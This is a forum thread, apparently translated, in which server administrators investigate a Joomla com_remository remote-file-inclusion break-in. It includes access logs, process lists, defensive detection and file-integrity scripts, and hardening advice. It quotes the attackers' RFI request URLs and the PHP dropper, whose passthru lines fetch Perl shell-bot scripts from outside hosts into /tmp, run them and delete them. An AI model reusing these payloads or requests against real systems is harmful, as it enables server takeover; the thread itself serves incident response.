216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde3//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.5//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.6//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.7//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:17 +0200] "GET /horde-3.0.8//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:17 +0200] "GET /horde-3.0.9//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /mail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /email//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /webmail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /newmail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /mails//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /mailz//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
85.214.35.238 - - [10/Sep/2006:16:39:36 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
85.70.97.197 - - [10/Sep/2006:16:49:19 +0200] "GET / HTTP/1.1" 200 239 "http://search1.seznam.cz/searchGoogleScreen?&from=11&step=10&mod=g"
213.133.109.71 - - [10/Sep/2006:16:54:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
regards
 
Okay, see below ;-)

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 680 248 ? S 10:16 0:00 init [3]
root 2 0.0 0.0 0 0 ? SN 10:16 0:00 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? S< 10:16 0:00 [events/0]
root 4 0.0 0.0 0 0 ? S< 10:16 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S< 10:16 0:00 [kthread]
root 19 0.0 0.0 0 0 ? S< 10:16 0:00 [kacpid]
root 114 0.0 0.0 0 0 ? S< 10:16 0:00 [kblockd/0]
root 154 0.0 0.0 0 0 ? S 10:16 0:00 [pdflush]
root 155 0.0 0.0 0 0 ? S 10:16 0:01 [pdflush]
root 157 0.0 0.0 0 0 ? S< 10:16 0:00 [aio/0]
root 156 0.0 0.0 0 0 ? S 10:16 0:00 [kswapd0]
root 749 0.0 0.0 0 0 ? S 10:17 0:00 [kseriod]
root 956 0.0 0.0 0 0 ? S< 10:17 0:00 [ata/0]
root 962 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_0]
root 963 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_1]
root 964 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_2]
root 965 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_3]
root 1204 0.0 0.0 0 0 ? S 10:17 0:01 [kjournald]
root 2152 0.0 0.0 1472 600 ? S<s 10:17 0:00 /sbin/udevd -d
root 2204 0.0 0.0 1460 444 ? S< 10:17 0:00 [hwscand]
root 2619 0.0 0.0 0 0 ? S 10:17 0:00 [khubd]
root 3543 0.0 0.0 1460 436 ? S< 10:17 0:00 [hwscand]
root 5231 0.0 0.0 1492 492 ? S<s 10:17 0:00 /sbin/dhcpcd -C -H -D -N -t 999999 -h elmo eth0
root 5468 0.0 0.0 1852 928 ? Ss 10:17 0:00 /sbin/syslog-ng
root 5471 0.0 0.0 1604 592 ? Ss 10:17 0:00 /sbin/klogd -c 1 -x -x
root 5497 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5499 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger imapd
root 5508 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5510 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger imapd-ssl
root 5517 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5519 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger pop3d
root 5527 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5529 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger pop3d-ssl
root 5617 0.0 0.1 4600 1972 ? Ss 10:17 0:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pid
root 5624 0.0 0.0 2152 924 ? Ss 10:17 0:00 /usr/sbin/xinetd
ntp 5657 0.0 0.2 2812 2812 ? SLs 10:17 0:00 /usr/sbin/ntpd -p /var/lib/ntp/var/run/ntp/ntpd.pid -u ntp -i /var/lib/ntp
root 5674 0.0 0.1 8732 1112 ? Ssl 10:17 0:00 /usr/sbin/nscd
named 5748 0.0 0.3 30864 3312 ? Ssl 10:17 0:00 /usr/sbin/named -t /var/lib/named -u named
root 5772 0.0 0.1 2444 1144 ? S 10:17 0:00 /bin/sh /usr/bin/mysqld_safe --user=mysql --pid-file=/var/lib/mysql/mysqld.pid --socket=/var
mysql 5850 0.2 2.6 104116 27072 ? Sl 10:17 0:45 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/my
qmails 5867 0.0 0.0 1516 472 ? S 10:17 0:00 qmail-send
qmaill 5869 0.0 0.0 1472 424 ? S 10:17 0:00 splogger qmail
root 5870 0.0 0.0 1500 360 ? S 10:17 0:00 qmail-lspawn ./Maildir/
qmailr 5871 0.0 0.0 1496 392 ? S 10:17 0:00 qmail-rspawn
qmailq 5872 0.0 0.0 1464 320 ? S 10:17 0:00 qmail-clean
root 5902 0.0 0.2 9640 2680 ? Ss 10:17 0:00 sshd: iiyama [priv]
root 5913 0.0 2.4 27852 25204 ? Ss 10:17 0:00 /usr/sbin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 5
root 5915 0.0 2.1 25276 22644 ? Ss 10:17 0:00 /usr/sbin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 5
popuser 5917 0.0 2.1 25408 22764 ? S 10:17 0:00 spamd child
popuser 5918 0.0 2.1 25276 22648 ? S 10:17 0:00 spamd child
popuser 5919 0.1 3.0 34468 32024 ? S 10:17 0:25 spamd child
popuser 5920 0.0 2.6 30280 27828 ? S 10:17 0:02 spamd child
iiyama 5953 0.0 0.2 9776 2788 ? S 10:17 0:02 sshd: iiyama@pts/1
iiyama 5954 0.0 0.1 4208 1816 pts/1 Ss 10:17 0:00 -bash
root 5975 0.0 1.4 29640 14672 ? Ss 10:17 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 6014 0.0 0.1 6576 2004 pts/1 S 10:17 0:00 su -
root 6055 0.0 0.0 1752 636 ? Ss 10:17 0:00 /usr/sbin/cron
root 6063 0.0 0.0 1908 632 tty1 Ss+ 10:17 0:00 /sbin/mingetty --noclear tty1
root 6064 0.0 0.0 1472 472 ttyS0 Ss+ 10:17 0:00 /sbin/agetty -L 57600 ttyS0
root 6066 0.0 0.2 12180 2120 ? Ssl 10:17 0:00 /usr/local/psa/admin/bin/modules/watchdog/monit -Ic /usr/local/psa/etc/modules/watchdog/moni
root 6065 0.0 0.5 16024 5660 ? Ss 10:17 0:00 /usr/local/psa/admin/bin/php /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c /usr/loc
root 6073 0.0 0.1 3180 1772 pts/1 S 10:17 0:00 -bash
drweb 6093 0.0 1.1 14932 12404 ? Ss 10:17 0:03 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
popuser 7513 0.0 0.1 3984 1064 ? S 10:30 0:00 /usr/bin/imapd Maildir
drweb 9020 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9021 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9022 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9023 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9024 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9025 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9026 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9027 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9028 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9029 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9030 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9031 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9032 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9033 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9034 0.0 1.1 14932 12408 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9035 0.0 1.1 14932 12408 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
root 5991 0.0 0.4 47856 5040 ? Ss 10:17 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19732 0.0 2.7 54816 28664 ? S 14:30 0:01 /usr/local/psa/admin/bin/httpsd
psaadm 19733 0.0 2.2 52756 23492 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19734 0.0 1.8 52756 19500 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19735 0.0 2.3 53752 24332 ? S 14:30 0:01 /usr/local/psa/admin/bin/httpsd
psaadm 19736 0.0 1.8 52512 19496 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19803 0.0 1.7 52604 18592 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
root 20170 0.0 0.2 8472 2108 pts/1 S+ 14:36 0:00 /usr/bin/mc -P /tmp/mc-root/mc.pwd.6073
root 20172 0.0 0.1 3184 1776 pts/0 Ss+ 14:36 0:00 bash -rcfile .bashrc
root 20279 0.0 0.2 9640 2676 ? Ss 14:39 0:00 sshd: iiyama [priv]
iiyama 20286 0.0 0.2 9776 2780 ? S 14:39 0:00 sshd: iiyama@pts/2
iiyama 20287 0.0 0.1 4208 1812 pts/2 Ss 14:39 0:00 -bash
root 20307 0.0 0.1 6576 1996 pts/2 S 14:39 0:00 su -
root 20310 0.0 0.1 3176 1768 pts/2 S 14:39 0:00 -bash
popuser 20628 0.0 0.0 3984 1036 ? S 14:44 0:00 /usr/bin/imapd Maildir
popuser 20637 0.0 0.1 3984 1052 ? S 14:44 0:00 /usr/bin/imapd Maildir
popuser 20638 0.0 0.1 3984 1044 ? S 14:44 0:00 /usr/bin/imapd Maildir
root 20647 0.0 0.1 2816 1360 ? S 14:44 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa
psaadm 21188 0.0 2.2 52796 23288 ? S 14:59 0:00 /usr/local/psa/admin/bin/httpsd
popuser 21611 0.0 0.0 3984 1036 ? S 15:03 0:00 /usr/bin/imapd Maildir
popuser 21615 0.0 0.1 3984 1072 ? S 15:03 0:00 /usr/bin/imapd Maildir
popuser 21635 0.0 0.1 3984 1080 ? S 15:04 0:00 /usr/bin/imapd Maildir
popuser 21636 0.0 0.1 3984 1088 ? S 15:04 0:00 /usr/bin/imapd Maildir
popuser 21637 0.0 0.1 3984 1048 ? S 15:04 0:00 /usr/bin/imapd Maildir
psaadm 22077 0.0 1.8 52952 19256 ? S 15:08 0:00 /usr/local/psa/admin/bin/httpsd
wwwrun 22691 0.1 2.0 35484 21244 ? S 15:20 0:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 22692 0.1 2.0 35124 20880 ? S 15:20 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 22722 0.2 2.0 34984 20860 ? S 15:22 0:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23168 0.0 1.9 34904 20540 ? S 15:32 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23323 0.1 1.9 34896 20476 ? S 15:35 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23324 0.0 1.9 34836 20696 ? S 15:35 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23454 0.2 1.9 34848 20596 ? S 15:38 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23457 0.1 1.9 34352 19880 ? S 15:39 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23489 0.7 1.9 34728 20252 ? S 15:39 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23492 0.6 1.9 34632 20528 ? S 15:39 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23702 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23703 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23704 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 23705 0.0 0.0 2724 824 pts/2 R+ 15:42 0:00 ps -aux
 
Hello,

at the moment no Perl is running, and Apache is not excessively active.

The last log excerpt doesn't contain what I'm looking for. If your system writes separate log files for the domains (e.g. Confixx in /path/to/webX/logs), search those too.
 
Hello,

in any case go into rescue mode immediately; further analysis steps can still be carried out afterwards.

To me it currently looks as if Joomla is the "problem child".
But that is only speculation.
 
Hello ...

I think I have finally found it ....

210.173.180.168 - - [13/Sep/2006:02:24:40 +0200] "GET /%20%09images/M_images/images/images/stories/images/images/images/stories/pozente.png HTTP/1.1" 200 25935 "-" "ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)"
Whatever the crawler may be looking for?

And this one shows up very often:
80.81.165.201 - - [13/Sep/2006:00:01:29 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://albanet.1500mb.com/e.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"

Calling it yields the following
<?
passthru('cd /tmp;wget 404 Error px;rm -f px*');
passthru('cd /tmp;curl -O 404 Error px;rm -f px*');
passthru('cd /tmp;lwp-download 404 Error px.tpxt;rm -f px*');
passthru('cd /tmp;lynpx -source http://albanet.1500mb.com/px >px;perl px;rm -f px*');
passthru('cd /tmp;fetch http://albanet.1500mb.com/px >px;perl px;rm -f px*');
passthru('cd /tmp;GET http://albanet.1500mb.com/px >px;perl px;rm -f px*');
?>
Owned by Morgan

63.247.85.242 - - [12/Sep/2006:15:35:18 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
203.63.5.173 - - [12/Sep/2006:15:36:07 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.79"
70.85.92.122 - - [12/Sep/2006:15:36:14 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
63.247.85.242 - - [12/Sep/2006:15:36:46 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
70.85.92.122 - - [12/Sep/2006:15:39:42 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
89.108.64.188 - - [12/Sep/2006:15:39:49 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://source.webcindario.com/ale.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.803"
87.117.208.50 - - [12/Sep/2006:15:40:23 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"

When calling the Webcindario one ....

<?
passthru('cd /tmp;wget La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;curl -O La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;lwp-download La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;lynx -source http://source.webcindario.com/nasti.txt >nnasti.txt;perl nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;fetch La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f txt*');
passthru('cd /tmp;GET http://source.webcindario.com/nasti.txt >nasti.txt;perl nasti.txt;rm -f nasti.txt*');
?>
Regards
 
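One way to pick the com_remository requests out of an access log, as an added example (not code from the original posts): it parses Apache Combined Log Format lines and flags any request whose query parameter carries a URL, which is exactly the mosConfig_absolute_path pattern shown above. The sample lines are constructed with documentation addresses and an invalid TLD for the dropper host.

```python
"""Detect remote-file-inclusion (RFI) attempts in Apache access-log lines.

Added example for this thread, not code from the original posts. It looks
for the pattern seen in the com_remository requests quoted above: a query
parameter (mosConfig_absolute_path) whose value is itself a URL, sent by a
scripted client (libwww-perl). The sample lines below are constructed.
"""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Apache Combined Log Format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi(line: str) -> Optional[dict]:
    """Return details if the request passes a URL in a query parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # parse_qsl also decodes %-encoded values, so an encoded http%3A%2F%2F is caught too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if URL_VALUE.match(value):
            return {
                "host": m.group("host"),
                "time": m.group("time"),
                "path": target.path,
                "param": name,
                "url": value,
                "status": int(m.group("status")),
                # The scanners in the thread all identified as libwww-perl.
                "scripted_client": m.group("agent").startswith("libwww-perl"),
            }
    return None


def summarize(lines: List[str]) -> Dict[str, object]:
    """Aggregate findings: hits per source host, the URLs that were offered for
    inclusion, and how many attempts the server answered with 200 (worth
    checking on the host, though a 200 alone does not prove execution)."""
    hits = [f for f in (find_rfi(line) for line in lines) if f]
    return {
        "total": len(hits),
        "by_host": Counter(f["host"] for f in hits),
        "urls": sorted({f["url"] for f in hits}),
        "params": sorted({f["param"] for f in hits}),
        "answered_200": sum(1 for f in hits if f["status"] == 200),
    }


# Constructed sample log lines (documentation IPs, invalid TLD for the dropper host).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Sep/2006:00:01:29 +0200] "GET /administrator/components/'
    'com_remository/admin.remository.php?mosConfig_absolute_path=http://dropper.example.invalid/e.txt? '
    'HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"',
    '192.0.2.11 - - [13/Sep/2006:00:02:01 +0200] "GET /administrator/components/'
    'com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F%2Fdropper.example.invalid%2Fv6.txt '
    'HTTP/1.1" 404 1046 "-" "libwww-perl/5.79"',
    '198.51.100.5 - - [13/Sep/2006:02:24:40 +0200] "GET /%20%09images/M_images/images/stories/pozente.png '
    'HTTP/1.1" 200 25935 "-" "ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)"',
    '198.51.100.9 - - [13/Sep/2006:03:00:00 +0200] "GET / HTTP/1.0" 200 1251 "-" '
    '"check_http/1.24.2.4 (nagios-plugins )"',
]

if __name__ == "__main__":
    for f in filter(None, map(find_rfi, SAMPLE_LOG)):
        print(f"{f['time']} {f['host']} -> {f['param']}={f['url']} ({f['status']})")
    print(summarize(SAMPLE_LOG))
```

Run it against a real access_log with `find_rfi` over each line; the crawler and monitoring lines from the thread produce no finding because they carry no URL-valued parameter.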
Yes, I see it the same way ....

at least as far as

/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

is concerned!

Patching that shouldn't be a problem ...

Can you see anything else from the script?

regards
 
Hello,

fundamentally you should rebuild your server completely.

Finding out everything that was modified and where files were dropped and so on is possible, but very time-consuming.

The shell bot alone (which according to your logs is present on your system) downloads various files; what those in turn do is a completely different matter.

So as I said, rebuild, apply the known patches, etc. etc.

Under no circumstances just plug a few holes and block ports, because in case of doubt you will only learn what else was changed once it is too late.
 
Hello,

in any case I thank you both - you've already helped me a lot ... and so I'll bite the bullet and rebuild everything :mad:

However, what I would be interested in is how one can trace what was changed, how and where? So what is the way to find that out?

Regards
 
Hello,

in hindsight that is not quite so easy.

But once you have rebuilt your server, you can install Tripwire.

Tripwire is a file checker that checks whether and, if so, when files were changed and notifies you about it.

You can find Tripwire here: SourceForge.net: Open Source Tripwire®
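A stripped-down version of what Tripwire does, added here as an illustration (not Tripwire's own code and not from the posts): take a baseline of content digests and permission bits for every file under a root, then report which files were added, removed or modified since. The directory tree in the demo is constructed so the script runs offline.

```python
"""Minimal file-integrity baseline and check, in the spirit of the Tripwire
recommendation above. Added example, not Tripwire's code and not from the posts.
A baseline maps each regular file to its SHA-256 digest, permission bits and
mtime; a later check reports files that were added, removed or modified.
"""
import hashlib
import json
import stat
import tempfile
from pathlib import Path
from typing import Dict, List


def _digest(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(root: str) -> Dict[str, dict]:
    """Record digest, permission bits and mtime for every regular file under root."""
    root_path = Path(root)
    base: Dict[str, dict] = {}
    for p in sorted(root_path.rglob("*")):
        if p.is_symlink() or not p.is_file():
            continue
        st = p.lstat()
        base[p.relative_to(root_path).as_posix()] = {
            "sha256": _digest(p),
            "mode": stat.S_IMODE(st.st_mode),
            "mtime": int(st.st_mtime),   # recorded for reporting "when", not compared
        }
    return base


def check(root: str, baseline: Dict[str, dict]) -> Dict[str, List[str]]:
    """Compare the current tree against a stored baseline."""
    now = take_baseline(root)
    report: Dict[str, List[str]] = {"added": [], "removed": [], "modified": []}
    for rel in sorted(set(now) | set(baseline)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in now:
            report["removed"].append(rel)
        elif (now[rel]["sha256"] != baseline[rel]["sha256"]
              or now[rel]["mode"] != baseline[rel]["mode"]):
            # mtime is deliberately not part of the comparison: it can be reset
            # with touch, whereas content digest and mode bits cannot be hidden.
            report["modified"].append(rel)
    return report


def save_baseline(baseline: Dict[str, dict], path: str) -> None:
    """Store the baseline; in practice keep this copy off the monitored host."""
    Path(path).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(path: str) -> Dict[str, dict]:
    return json.loads(Path(path).read_text())


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a small tree, then add, modify, chmod and
    delete files and see the check report each change."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for sub in ("etc", "tmp", "bin"):
            (root / sub).mkdir()
        (root / "etc" / "php.ini").write_text("allow_url_fopen = On\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        wget = root / "bin" / "wget"
        wget.write_text("#!/bin/sh\n")
        wget.chmod(0o755)
        save_baseline(take_baseline(d), str(root / "baseline.json"))
        baseline = load_baseline(str(root / "baseline.json"))
        (root / "baseline.json").unlink()                       # keep it out of the tree
        (root / "tmp" / "px").write_text("# new file\n")          # added
        (root / "etc" / "php.ini").write_text("allow_url_fopen = Off\n")  # content changed
        wget.chmod(0o700)                                         # only mode changed
        (root / "etc" / "hosts").unlink()                         # removed
        return check(d, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```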
 
Hello,

if that could be done with reasonable effort and the required certainty, you wouldn't need to reinstall.

In particular, root can manipulate the logfiles at will; a hacker who has obtained root privileges can modify the logs so that one gets the impression he only ran an IRC bot and nothing else.

That even has an advantage over hiding completely: the hacker can't fake everything, e.g. not the traffic statistics in the customer menu at the provider. The server owner (or whoever still considers himself to be that :D ) sees the traffic peaks, investigates the cause, finds the IRC bot, removes it including the entry hole and keeps the server running without reinstalling.

The hacker has additionally installed a little backdoor, leaves the server alone for the time being and falls back on it at some point when he can use it for a (then really big) attack. He could also log all passwords and collect them now and then.

That was only a theoretical possibility, but with reasonable effort and sufficient certainty it cannot be distinguished from a break-in that really only ran the bot.

The big freely available PHP packages are the main attack vector, because they are so widespread that one only has to go through domains on suspicion with the corresponding requests and often enough finds one that didn't get all updates installed quickly enough.

With allow_url_fopen=off and chmod 700 on wget the attack would have come to nothing in your case.
 